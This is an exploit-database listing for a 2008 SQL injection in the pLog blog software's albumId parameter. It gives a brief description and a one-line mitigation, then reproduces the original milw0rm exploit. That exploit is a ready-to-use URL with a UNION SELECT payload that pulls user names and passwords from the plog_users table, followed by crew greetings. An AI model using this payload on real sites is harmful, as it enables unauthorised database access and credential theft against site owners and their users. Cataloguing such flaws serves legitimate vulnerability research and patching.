header-logo
Suggest Exploit
vendor:
pLog
by:
DreamTurk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: pLog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

pLog (albumId) Remote Sql Inj.

pLog is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the application's database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

pLog (albumId) Remote Sql Ä°nj.

DreamTurk / dream@dr3amturk.org

Down : http://sourceforge.net/project/showfiles.php?group_id=83964&package_id=86556

http://localhost/index.php?op=ViewAlbum&albumId=-1/**/union/**/select/**/0,1,user,password,4,5,6,7,8 from plog_users/*&blogId=1

4ever sqL L0v3r'Z Crew 2008 http://coderx.org

Greatz : Cr@zy_King & BLasTer & DarKxBoyZ & Rmx & TR_ip & str0ke

----------- 

# milw0rm.com [2008-06-02]

Navigation

Suggest Exploit

Services By CQR